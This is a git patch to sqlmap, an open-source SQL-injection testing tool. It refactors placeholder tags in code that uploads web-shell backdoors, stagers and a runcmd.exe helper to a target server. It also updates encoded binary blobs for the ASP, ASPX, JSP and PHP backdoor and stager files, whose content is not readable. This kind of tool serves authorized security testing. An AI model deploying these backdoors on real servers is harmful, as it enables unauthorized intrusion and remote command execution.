From faaae2b647eb99498845ef9e26e52154495d4549 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 17:08:44 +0100 Subject: [PATCH] Minor refactoring --- lib/core/settings.py | 6 +++++- lib/takeover/web.py | 8 +++++--- shell/backdoors/backdoor.asp_ | Bin 240 -> 243 bytes shell/stagers/stager.asp_ | Bin 1199 -> 1201 bytes shell/stagers/stager.aspx_ | Bin 527 -> 529 bytes shell/stagers/stager.jsp_ | Bin 1320 -> 1321 bytes shell/stagers/stager.php_ | Bin 377 -> 379 bytes txt/checksum.md5 | 14 +++++++------- 8 files changed, 17 insertions(+), 11 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 741fe3c27..118286cc6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.8" +VERSION = "1.2.2.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -299,6 +299,10 @@ BASIC_HELP_ITEMS = ( "wizard", ) +# Tags used for value replacements inside shell scripts +SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%" +SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%" + # String representation for NULL value NULL = "NULL" diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2952a127f..2395b06b2 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -47,6 +47,8 @@ from lib.core.enums import WEB_API from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import SHELL_RUNCMD_EXE_TAG +from lib.core.settings import SHELL_WRITABLE_DIR_TAG from lib.core.settings import VIEWSTATE_REGEX from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset @@ -134,7 +136,7 @@ class Web: def _webFileInject(self, fileContent, fileName, directory): outFile = posixpath.join(ntToPosixSlashes(directory), fileName) - uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) + uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) query = "" if isTechniqueAvailable(kb.technique): @@ -324,7 +326,7 @@ class Web: with open(filename, "w+b") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) - _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) + _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) @@ -369,7 +371,7 @@ class Web: continue _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory diff --git a/shell/backdoors/backdoor.asp_ b/shell/backdoors/backdoor.asp_ index d126faee7dc5a9a89bf0bedd9fd38fc780106cb0..9f9a20586cb42b43b9922e9cec98653d51e8445e 100644 GIT binary patch literal 243 zcmVJoQ00dF~d)9I`{sHkyaO7CB^hRo09;0%qzxvN zR08wGB1%%4_whjLs1mw3L3mFo_%*OCUD!hM1iZr)4gqpQ7$`@Z$I t5{c{;F9gDEJ;WbQZtU~=1M3iejpNV=T=LRMapyrmc@AlN3ykH$+V<3lOIHP{$ZPj z*L|_`2ku4;20Ked=n5K|!NGbLOHdal6%XeR{RhO#%@(OFTJLqH5IdI9_*jzTzbjFS z4XqJCx$CAn{TctF&f2C#uvX~s3*H8PsWG*9azT$50@#n?w_x2*hGCR#xrYWf@x(Ar zYcSYufUm?Wn~5l_zz8d{xV*~530BpEy3f-dzO%?R(?^`T17!GJcgRG45eE4HQh3|| diff --git a/shell/stagers/stager.asp_ b/shell/stagers/stager.asp_ index 75a64c1fc4158402453f7ba8b05da736f4c397a4..7918d6ac7aa9aa2dceb74c6b9727606327146241 100644 GIT binary patch literal 1201 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 literal 1320 zcmV+@1=soqoRult5!*R$0_P}P-K3fRq4d(143G}H|-qdQFvR8u(PWFpUPy?uvydU^(t(b6jkE#{y z0E%IvuxVCs06JzVij*orb6MW#)d)Y5kP(W!Yb8z1!{Z^Nqu#e3#macjI|uB;tBHrY zI3X^_Lo(nYloqyvYHZWI&S@^WbgqO~?v=t~`y;b8KdGL*d3UhYjydt4OSjH)m(Q0K_8gPCFkcQzfwSmlwmTpsPz^ z*H##TlycWD3X_-YlCyHldx{H{ILGTHB|ocyCFoVnj1q+@Ook$*hltngZ`j~Z05 zIl9|%z6b3{^&m|ymzlLe^u7oCX82rTRbsP2TBv6&v)~rSOD~FM-5t!$mc>rAU5aTa z#HAUDAx-ohsnL{-YFc>}lb&Ub(G;5z(+mlU{GccQGusK2%oHcGf;e_`Me_!y*JcZI zbBWqDwNG&TmT&!^z}fRrWh*TyRO`r$Yhr@xd10{$2>bS@tNYoXmlx=p*QfYo%JrLz zK=kU_>2G;_1Hf`5I#1np=Iz(D+ch)akj)+F1~&>^sU?6mJ;#Eqrj;x*Nu7~-Kh%sU z6EMr~_x)^0!66Tp*IiR@xOe=~B@_4?w9LzL$h4UIeO}K3*iW&}X!s)J@|zlVl~+*{ z6;aY%RmFhR`inO^3;<1vSk)N5iFL_O)OydU4LE~mx5~*^&59*}Nj|xbNwvqN`~_VN zAjg}OW6K4@g}2fjqZ)fzT#0;OO=-Uh+{DBRjyR;-GnM`_sgkicpyeN*6Vs0?9{EE5 z)TdpiBR7Wnz~7arz>bQeKA83&FO~XQlrwr-}YyiQZq) z$5ic~oNp`FvPNESF%nm>(*?Pt8MV$K%2}l2%kX%#D-}Q5URX0%mLd7IFwAA(Dc`N6de*i{QuGJIs;!N z=X@n#;4W`_G`3cQm1z(Z;afyWHfPH+@H@FIsAEcuiT>z(t1Id=e za0V^NORq()Mt5{3zaLj2EVrCc1IxL89(!s8fa99Tu)4jU$-q z>x=DeJWvsoQa3_SHv)aY+jasi%1|k#d eY+&}o3`{c46->@(5P%IN1U)XiKK*nc;xPJ@u#(UK diff --git a/shell/stagers/stager.php_ b/shell/stagers/stager.php_ index 64f8eacabdfe758595297d199003ff5c069690f2..54c8930a26d54df1f70408548752b0f64b8ddf5e 100644 GIT binary patch literal 379 zcmV->0fhbsoSl;I6oNlv#^3iSV>ppLvx3DRsny6=7p$rK!8^pfbZ|q@ofuOc|NAk` zE{wg{1LFqI0-oo&Q0kLY&LtaoYm(Pd8A~n4M~Y^E zbh&<-S0~qe$0gGUj4W?CJ#o*F58x;Evl;{sv)st_1%3i@eTq8FkS=k1;7e_Xb7ZtP zd&xaf`lZEcbvhU7Tg`QTRYF;J;cJxrjr-XY3b()}y(S-ES$au^gXT{4t(m`AOU%IT ztX0?hBv$dpwGFCqEB@uGl6sS);74tYU=hIvdVxSO*!N%zb?>~`R0s)JWX&iE$Go8O Z9W=>$2!iTxEU!@$%04m7)@Z_R>iXz6y($0z literal 377 zcmV-<0fznuoSl*)6v9tuh41}pUU#Tzi)1|318~*|} zt2}1A*ag!|SkFdSP_;QaCA7$C7o=0M(AtsjK|#4bxPmH?v1h@xu3*}T5BrBpT4Sy< z#Wjy&=2{-PrX-yd93S*VlG>7U+wBHt1(Ek}gwYeR3xjGa+Yh~h1~cW`V=T7AE*yz2 zq$}+RH_%-bz^)Y`z)7u5 zK8l!&p0c<-v4~=eazMs6-2#bQnn{){dDINsSKthhS4$Ak8#(LPE zD&;8